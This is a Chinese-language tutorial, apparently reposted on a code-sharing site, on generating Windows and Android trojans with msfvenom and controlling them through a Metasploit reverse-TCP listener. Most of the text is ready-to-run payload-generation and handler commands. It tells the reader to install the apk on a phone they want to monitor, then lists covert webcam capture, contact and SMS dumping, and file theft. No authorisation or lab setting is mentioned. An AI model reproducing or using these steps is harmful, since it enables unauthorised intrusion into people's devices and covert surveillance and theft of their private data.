metasploit、msfvenom生成木馬入侵電腦及手機


簡介

msfvenom

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成后門的軟件

查看所有--payload的模塊

msfvenom -l payloads

文件后綴名-f的格式

msfvenom --help-formats

metasploit

Metasploit Framework(MSF)是一款開源安全漏洞檢測工具,附帶數千個已知的軟件漏洞,並保持持續更新。Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,被安全社區冠以“可以黑掉整個宇宙”之名。剛開始的Metasploit是采用Perl語言編寫的,但是再后來的新版中,改成了用Ruby語言編寫的了。在kali中,自帶了Metasploit工具。

生成的木馬是前端的話,那么這個就是后端

msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=222.222.221.140 lport=1211 -f exe > /root/shell.exe

啟動metasploit

輸入命令:

msfconsole

metasploit偵聽

msf > use exploit/multi/handler     #加載模塊
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #設置payload
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost kali的ip   #設置kali的ip
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211   #設置kali的端口
lport => 1211
msf exploit(multi/handler) > exploit   #執行
[*] Started reverse TCP handler on 222.222.221.140:1211 

將生成的shell上傳至windows主機中並運行

提示有返回即可控制對方電腦,如同操作linux服務器一樣

使用

? - 幫助菜單

download -下載文件/文件夾

msfvenom的apk在android中的使用

msfvenom生成shell.apk

ifconfig查看kali的ip,ip為222.222.221.140

輸入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk

這里的5555是設置的端口,也可以自己更改,顯示這個說明已經生成成功 只有9K多大小

啟動metasploit

輸入命令:

msfconsole

啟動msfconsole

metasploit配置及監聽

在控制台中輸入

use exploit/multi/handler   //加載模塊

set payload android/meterpreter/reverse_tcp   //選擇Payload

show options   //查看參數設置

這里需要設置LHOST的ip地址,也就是你的kali的ip地址

還有LPORT端口,剛才設置的為5555,也需要更改一下(剛才直接設置為4444也是可以的)

set LHOST 192.168.1.114   //這里的地址設置成我們剛才生成木馬的IP地址(kali的ip)

set LPORT 5555   //這里的端口設置成剛才我們生成木馬所監聽的端口

exploit   //開始執行漏洞 開始監聽,等待手機上線

接下來就要把生成的apk裝在你想監控的手機上了,等待手機上線了

使用

然后可以輸入sysinfo 查看手機信息

webcam_list 查看手機有多少個攝像頭 這里顯示是2個

webcam_stream  //開啟攝像頭

webcam_snap //隱秘拍照功能

dump_contacts //導出電話號碼

dump_sms  //導出信息

導出的文件拍的照片都會在root下面

可以輸入?查看更多命令

session切換

background    #后台運行當前session
sessions    #列出所有session
sessions -i Id   #選擇某一個sessionID進入session
sessions -n Name -i Id    #給session重命名

參考:https://blog.csdn.net/langtuteng17/article/details/80444115


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM